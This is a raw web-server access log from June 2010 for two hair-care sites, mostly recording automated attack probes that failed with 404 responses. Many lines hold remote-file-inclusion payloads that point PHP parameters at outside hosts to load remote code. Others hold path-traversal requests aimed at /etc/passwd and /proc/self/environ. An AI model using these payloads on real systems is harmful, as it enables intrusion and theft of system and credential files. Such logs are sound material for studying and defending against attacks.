74.124.198.60 - - [13/Jun/2010:22:00:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:48 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:00:55 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:00:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:00:58 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:58 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:00:58 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:01:06 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:01:06 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:01:06 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:01:34 -0700] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:01:44 -0700] "GET /logs/access_091221.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:02:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.143.198 - - [13/Jun/2010:22:02:54 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.37.143.198 - - [13/Jun/2010:22:02:55 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.37.143.198 - - [13/Jun/2010:22:02:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.37.143.198 - - [13/Jun/2010:22:02:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:03:04 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:03:26 -0700] "GET /logs/access_100208.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:03:49 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.219.199.50 - - [13/Jun/2010:22:03:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:03:57 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:03:57 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:03:57 -0700] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:03:58 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:12 -0700] "GET /logs/access_100208.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:15 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:15 -0700] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:30 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:38 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:04:44 -0700] "GET /logs/access_100412.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:05:24 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:05:33 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:05:36 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:05:38 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:06:36 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:06:42 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:06:53 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:06:53 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.114.238 - - [13/Jun/2010:22:07:39 -0700] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:08:59 -0700] "GET /logs/access_091207.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:09:36 -0700] "GET /logs/access_091207.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:22:10:41 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:22:10:42 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:22:10:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [13/Jun/2010:22:11:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:22:11:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:22:11:50 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:22:11:50 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:22:11:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [13/Jun/2010:22:11:51 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:16:29 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:16:29 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:16:29 -0700] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:16:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:16:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:16:32 -0700] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:16:32 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:16:32 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:16:33 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:17:53 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:17:53 -0700] "GET /logs/access_091228.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:17:53 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [13/Jun/2010:22:17:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13175 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [13/Jun/2010:22:18:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12886 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [13/Jun/2010:22:18:15 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13743 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:18:22 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:18:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:18:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [13/Jun/2010:22:18:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18874 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:18:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:18:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:18:26 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [13/Jun/2010:22:18:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14422 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
220.181.94.229 - - [13/Jun/2010:22:18:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:18:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:18:47 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:18:47 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [13/Jun/2010:22:18:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:22:19:11 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:19:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [13/Jun/2010:22:19:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15069 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:22:19:12 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:19:13 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:19:16 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.229 - - [13/Jun/2010:22:19:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:19:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:19:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:19:26 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:19:27 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:19:29 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:20:26 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:21:04 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:21:04 -0700] "GET /logs/access_100412.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:21:04 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:21:05 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:21:05 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:21:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:21:45 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:21:45 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:21:45 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.56 - - [13/Jun/2010:22:22:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.freehairsecrets.com"
125.141.91.138 - - [13/Jun/2010:22:22:22 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
125.141.91.138 - - [13/Jun/2010:22:22:23 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
125.141.91.138 - - [13/Jun/2010:22:22:24 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
125.141.91.138 - - [13/Jun/2010:22:22:24 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:22:22:39 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:25:03 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:25:06 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:26:25 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:26:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.219.199.50 - - [13/Jun/2010:22:26:27 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:00 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:04 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
